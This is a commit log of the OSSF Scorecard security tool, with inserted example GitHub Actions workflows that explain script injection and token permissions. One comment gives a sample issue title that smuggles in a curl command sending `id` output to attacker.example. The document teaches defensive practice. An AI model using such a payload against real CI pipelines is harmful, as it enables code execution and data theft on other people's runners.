Commit Graph

1005 Commits

Author SHA1 Message Date
laurentsimon
cf71c9539c
Add details to message for default location in SARIF (#1414)
* add details to message

* fix
2021-12-23 19:06:02 +00:00
dependabot[bot]
eef99b5ce0
🌱 Bump actions/setup-go from 2.1.4 to 2.1.5 (#1407) 2021-12-22 08:40:44 -06:00
laurentsimon
3c1e8148d4
Do not expose sarif and policy command (#1405)
* hide sarif support

* use variable
2021-12-21 18:05:56 +00:00
laurentsimon
6f21258131
reduce score by 1 (#1404) 2021-12-21 17:28:31 +00:00
dependabot[bot]
090ae4f0bb
🌱 Bump actions/stale from 4.0.0 to 4.1.0 (#1384)
Bumps [actions/stale](https://github.com/actions/stale) from 4.0.0 to 4.1.0.
- [Release notes](https://github.com/actions/stale/releases)
- [Changelog](https://github.com/actions/stale/blob/main/CHANGELOG.md)
- [Commits](cdf15f641a...7fb802b307)

---
updated-dependencies:
- dependency-name: actions/stale
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
2021-12-17 17:53:20 +00:00
dependabot[bot]
f9daa4e3cc
🌱 Bump github.com/rhysd/actionlint from 1.6.7 to 1.6.8 (#1267)
Bumps [github.com/rhysd/actionlint](https://github.com/rhysd/actionlint) from 1.6.7 to 1.6.8.
- [Release notes](https://github.com/rhysd/actionlint/releases)
- [Changelog](https://github.com/rhysd/actionlint/blob/main/CHANGELOG.md)
- [Commits](https://github.com/rhysd/actionlint/compare/v1.6.7...v1.6.8)

---
updated-dependencies:
- dependency-name: github.com/rhysd/actionlint
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
2021-12-17 17:24:32 +00:00
laurentsimon
df3d50df76
🐛 Fix score calculation for multiple files (#1401)
* multi file support

* fix multi-files permissions

* change name

* add tests

* use struct for files

* comments

* comment
2021-12-16 23:16:02 +00:00
laurentsimon
3d9b1d2900
[RAW] Branch Protection support (#1396)
* raw bp

* missing files

* context never nil

* support raw bp

* unit tests

* remove comments

* merging

* linter
2021-12-16 21:42:05 +00:00
asraa
c795615321
Enable dangerous workflow in release test (#1402)
* enable dangerous workflow in release test

Signed-off-by: Asra Ali <asraa@google.com>

* fix

Signed-off-by: Asra Ali <asraa@google.com>

Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
2021-12-16 18:49:49 +00:00
Azeem Shaikh
26733c95be
Update timeout for retries (#1403)
Co-authored-by: Azeem Shaikh <azeems@google.com>
2021-12-16 10:25:35 -08:00
Azeem Shaikh
be7fe32866
Fix more retry breakages (#1398)
Co-authored-by: Azeem Shaikh <azeems@google.com>
2021-12-15 23:27:23 +00:00
Azeem Shaikh
ecc96576f4
Refactor to improve readability (#1394)
Co-authored-by: Azeem Shaikh <azeems@google.com>
2021-12-15 15:01:34 -08:00
Azeem Shaikh
bbbca2bd87
Fix retry workflow (#1397)
Co-authored-by: Azeem Shaikh <azeems@google.com>
2021-12-15 14:31:46 -08:00
naveen
a13b63eae2
🌱 Improves the ci-e2e with retries 2021-12-15 12:50:36 -06:00
laurentsimon
f2cee41ca9
[RAW]: dependency update tool (#1391)
* dependency update tool

* rename

* missing files

* add fields

* rm field
2021-12-15 17:02:31 +00:00
Jason Hall
cef72f0f7d
🐛 Fix ko build workflows in Makefile (#1392)
* Use ko to build everything in cloudbuild.yaml

* --push=false and undo cloudbuild.yaml changes for now
2021-12-15 10:35:07 -06:00
laurentsimon
46e94eb925
[DRAFT: RAW]: Security policy support (#1372)
* raw sec policy

* missing file

* fix validation of check.yml

* updates

* comments

* dead code

* comments
2021-12-14 23:51:42 +00:00
laurentsimon
551961718d
[RAW] End-to-end support for raw results for Binary-Artifacts (#1255)
* split binary artifact check

* fix

* missing file

* comments

* fix

* comments

* draft

* merge fix

* fix merge

* add indirection

* comments

* comments

* linter

* comments

* updates

* updates

* updates

* linter

* comments
2021-12-14 21:10:24 +00:00
Chris McGehee
f991fee32d
Adding line numbers for rest of Token-Permissions (and by extension, Packaging) (#1381)
2021-12-14 04:14:35 +00:00
laurentsimon
ca97581538
Comply with GH-specific rules for SARIF (#1379)
* GH-specific validation rules

* fix

* fix
2021-12-14 01:47:57 +00:00
Naveen
a0513aa877
Update stale.yml 2021-12-13 16:53:51 -06:00
olivekl
d4df1f6136
Update README.md (#1388)
Update link for more useful GH app authentication instructions
2021-12-13 20:50:43 +00:00
olivekl
fa29896003
Clarify Authentication and Token info in README.md (#1387)
Add suggestion of which PAT to set;
Add explanation of why authentication is needed;
Clarify the "either-or" options for authentication;
Add link to GH Installations (please confirm link is correct)
2021-12-13 10:08:19 -08:00
Naveen
9c89717239
🌱 Fix the stale configuration. (#1385)
A number of issues and PRs aren't getting attention, and this will help
us with that.
2021-12-13 08:52:01 -08:00
dependabot[bot]
870a850cc3
🌱 Bump github.com/onsi/gomega from 1.16.0 to 1.17.0 (#1225)
Bumps [github.com/onsi/gomega](https://github.com/onsi/gomega) from 1.16.0 to 1.17.0.
- [Release notes](https://github.com/onsi/gomega/releases)
- [Changelog](https://github.com/onsi/gomega/blob/master/CHANGELOG.md)
- [Commits](https://github.com/onsi/gomega/compare/v1.16.0...v1.17.0)

---
updated-dependencies:
- dependency-name: github.com/onsi/gomega
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
2021-12-12 15:25:44 +00:00
laurentsimon
86fd966dc4
Don't use the policy filename in SARIF results (#1373)
* don't display a policy file

* fix utests

* update msg

* update test
2021-12-10 17:07:32 -08:00
asraa
cfa1593e1c
Add Script Injection to Dangerous-Workflow (#1368)
* add dangerous workflow pattern script injection

Signed-off-by: Asra Ali <asraa@google.com>

* add more tests

Signed-off-by: Asra Ali <asraa@google.com>

* update laurent comments

Signed-off-by: Asra Ali <asraa@google.com>
2021-12-09 13:53:55 -08:00
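As an added illustration of the pattern this commit teaches the Dangerous-Workflow check to detect, not code from the Scorecard repository: a constructed GitHub Actions workflow that interpolates an attacker-controlled event field straight into a shell step, beside the usual fix of passing the value through an environment variable. The workflow and job names, and the attacker host, are made up.

```yaml
# Constructed example, not from the Scorecard repository.
# VULNERABLE: `${{ ... }}` is expanded by the Actions expression evaluator
# before the shell ever runs, so whoever opens the issue controls part of
# the script. A title such as
#   a"; curl "https://attacker.example/?x=$(id)"; echo "
# closes the quoted string and runs arbitrary commands on the runner.
name: triage-vulnerable
on:
  issues:
    types: [opened]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"

---
# HARDENED: the untrusted value is bound to an environment variable and
# referenced as a quoted shell variable. The shell treats it as data,
# never as code, whatever the title contains.
name: triage-hardened
on:
  issues:
    types: [opened]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $ISSUE_TITLE"
```

The same treatment applies to every other field a contributor can write, such as pull request titles and bodies, branch names (`github.head_ref`), commit messages and review comments: the expression goes into `env:`, the `run:` line reads only the shell variable.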
Jamie Magee
777713901e
docs: add installation instructions for mac and linux 2021-12-08 18:27:41 -06:00
Evgeny Vereshchagin
75bcc333de
CI-Tests: look for test-related strings in target urls as well (#1374)
Apparently some projects like systemd and bcc put links (containing
the word "Jenkins") to their Jenkins instances in target urls.

https://buildbot.iovisor.org/jenkins/job/bcc-pr/1157/
https://jenkins-systemd.apps.ocp.ci.centos.org/job/upstream-vagrant-archlinux-sanitizers/8288/

It's a follow-up to https://github.com/ossf/scorecard/pull/1293#issuecomment-976384882

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
2021-12-08 17:34:28 +00:00
Evgeny Vereshchagin
01ebb0dcf3
Pinned-Dependencies: show where exactly parsing fails (#1297)
Looks like due to https://github.com/mvdan/sh/issues/636
scorecard can't parse comments quoted with backticks like
```
cmd -a \
    -b `# without backticks -c below would be a separate command` \
    -c
```
and fails with something like
```
error parsing shell code: 82:26: reached EOF without closing quote `
```

This PR turns that message into
```
error parsing shell code: vagrant/bootstrap_scripts/arch-sanitizers-clang.sh: 82:26: reached EOF without closing quote `
```
which is a bit more useful.

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
2021-12-08 01:52:08 +00:00
laurentsimon
6e013cf67d
Token-Permission: Allow top level permissions not defined if all run level permissions are (#1356)
* doc

* allow non defined top level

* fix

* e2e fix

* linter
2021-12-08 01:18:28 +00:00
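As an added example of the two layouts this commit distinguishes, not code from the Scorecard repository (the workflow names, job names and steps are made up): a workflow with no top-level `permissions:` block whose every job declares its own, which the check now accepts, beside one where a job is left without any declaration and therefore runs with the repository's default GITHUB_TOKEN permissions.

```yaml
# Constructed example, not from the Scorecard repository.
# ACCEPTED after this change: no top-level `permissions:`, but every job
# declares its own, so no job falls back to the repository default token.
name: release-scoped
on:
  push:
    tags: ['v*']
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - run: make build
  publish:
    runs-on: ubuntu-latest
    needs: build
    permissions:
      contents: write   # only this job may push a release
    steps:
      - run: ./scripts/publish.sh

---
# NOT COVERED by the exemption: `lint` declares nothing and there is no
# top-level block to inherit from, so that job runs with the repository's
# default GITHUB_TOKEN permissions, which depend on a repository setting
# and may be read-write on every scope.
name: release-leaky
on:
  push:
    tags: ['v*']
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - run: make build
  lint:
    runs-on: ubuntu-latest
    steps:
      - run: make lint
```

A job-level `permissions:` block replaces, rather than extends, the top-level one, so a top-level `permissions: read-all` plus a single `contents: write` on the publishing job is the equivalent belt-and-braces layout when a top-level block is wanted anyway.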
Evgeny Vereshchagin
2e391503e4
Code-Review: show PRs merged without code review (#1375)
to make it easier to figure out whether those PRs are really merged
without code review or whether there is a bug in scorecard like
https://github.com/ossf/scorecard/issues/1260 that prevents it
from finding reviewed PRs. Other than that, the "CI-Tests" check
already shows "untested" PRs so it seems the "Code-Review" check
should follow suit.
2021-12-07 16:47:29 -08:00
Chen
be9a6234b5
Update the Risk of dangerous-workflow (#1361)
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
2021-12-07 18:00:36 +00:00
Evgeny Vereshchagin
5043cbcc7c
CI-Tests: no longer fail if there are no check suites (#1335)
In PRs like https://github.com/iovisor/bcc/pull/3626 no check suites
are triggered:
```
$ curl --silent  -H "Accept: application/vnd.github.v3+json"   3fcf0f1b58/check-runs
{
  "total_count": 0,
  "check_runs": [

  ]
}
```
```
 curl --silent  -H "Accept: application/vnd.github.v3+json"   3fcf0f1b58/check-suites
{
  "total_count": 0,
  "check_suites": [

  ]
}
```
The check should just keep going because "statuses" still can be
triggered so it should use them instead:
Closes https://github.com/ossf/scorecard/issues/1285

Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
2021-12-07 03:27:59 +00:00
laurentsimon
1aac7aa39c
update log msg for non-pinned actions (#1370) 2021-12-06 19:33:27 -06:00
laurentsimon
063d384b6d
move dir (#1367) 2021-12-06 17:57:02 +00:00
laurentsimon
023eab671e
Ignore local actions that are not pinned (#1357)
* ignore local actions

* missing files
2021-12-06 16:36:42 +00:00
Chris McGehee
38b5199e9e
🐛 Adding line numbers to token-permissions and a couple other places (#1363)
* Adding line numbers to token-permissions and a couple other places

* Fix deadlink for security policy

Signed-off-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>

* Updating formatting

Co-authored-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>
2021-12-06 10:05:52 -06:00
Batuhan Apaydın
1eb4d0e73e
Fix deadlink for security policy
Signed-off-by: Batuhan Apaydın <batuhan.apaydin@trendyol.com>
Co-authored-by: Furkan Türkal <furkan.turkal@trendyol.com>
2021-12-05 11:26:29 -06:00
laurentsimon
b323cded04
🐛 checks.yml not sync'ed with checks.md (#1360)
* update docs

* update

* remove file

* remove improper commit

* fix
2021-12-04 08:56:50 -06:00
laurentsimon
afe55a83c1
🐛 Disable pinning lock file search in repo (#1315)
* fix

* linter

* linter

* linter

* comment
2021-12-04 00:44:09 +00:00
Evgeny Vereshchagin
9f7e682fe6
CI-Check: add SemaphoreCI and Packit-as-a-Service (#1293)
to make it more likely for some projects to pass the check

https://semaphoreci.com/
https://github.com/marketplace/packit-as-a-service

Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
Co-authored-by: laurentsimon <64505099+laurentsimon@users.noreply.github.com>
2021-12-03 23:33:01 +00:00
Azeem Shaikh
84d169bf23
Use updated clients for local (#1355)
Co-authored-by: Azeem Shaikh <azeems@google.com>
2021-12-03 15:09:04 -08:00
laurentsimon
aed511670f
Cleanup Branch Protection and add e2e tests (#1344)
* BP cleanup

* linter

* e2e fix

* linter

* linter

Co-authored-by: asraa <asraa@google.com>
2021-12-03 21:53:18 +00:00
laurentsimon
3eb2e5aec8
license (#1350) 2021-12-03 21:01:38 +00:00
laurentsimon
b8d7a6b722
make critical (#1348) 2021-12-03 17:55:54 +00:00
Nanik
45b5a35020
Add new checking for license file availability (#1178)
* Add checking logic inside license_check.go
* Add test case license_check_test.go
* Add check information inside checks.yaml
2021-12-03 09:28:27 -08:00
laurentsimon
8cb4804c28
Update action names (#1346)
* update action

* add schedule

* comments

* e2e fix
2021-12-03 02:17:00 +00:00
laurentsimon
c3c017bf6f
npm ci only (#1314) 2021-12-03 01:37:18 +00:00
laurentsimon
938c637ee0
rem audio files (#1300)
Co-authored-by: Naveen <172697+naveensrinivasan@users.noreply.github.com>
Co-authored-by: Azeem Shaikh <azeemshaikh38@gmail.com>
2021-12-03 00:54:06 +00:00